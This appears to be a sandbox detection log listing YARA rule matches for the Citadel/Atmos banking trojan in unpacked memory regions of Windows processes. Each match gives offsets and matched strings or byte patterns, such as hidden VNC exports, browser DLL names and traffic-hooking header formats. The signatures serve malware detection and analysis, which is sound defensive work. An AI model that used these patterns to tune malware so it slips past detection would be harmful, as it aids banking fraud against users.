9.0.RuntimeBroker.exe.110000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
3.0.svchost.exe.910000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
3.0.svchost.exe.910000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
3.0.svchost.exe.910000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
3.0.svchost.exe.910000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
3.0.svchost.exe.910000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
3.0.svchost.exe.910000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
3.0.svchost.exe.910000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
3.0.svchost.exe.910000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
3.0.svchost.exe.910000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
3.0.svchost.exe.910000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
24.3.svchost.exe.fb0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
24.3.svchost.exe.fb0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
24.3.svchost.exe.fb0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
24.3.svchost.exe.fb0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
24.3.svchost.exe.fb0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
2.3.sihost.exe.ac0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
2.3.sihost.exe.ac0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.3.sihost.exe.ac0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
2.3.sihost.exe.ac0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
2.3.sihost.exe.ac0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
6.3.explorer.exe.c350000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
6.3.explorer.exe.c350000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
6.3.explorer.exe.c350000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
6.3.explorer.exe.c350000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
15.0.smartscreen.exe.290000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
15.0.smartscreen.exe.290000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
15.0.smartscreen.exe.290000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
15.0.smartscreen.exe.290000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
15.0.smartscreen.exe.290000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
14.0.RuntimeBroker.exe.ab0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
14.0.RuntimeBroker.exe.ab0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
14.0.RuntimeBroker.exe.ab0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
14.0.RuntimeBroker.exe.ab0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
14.0.RuntimeBroker.exe.ab0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
0.0.services.png.exe.400000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
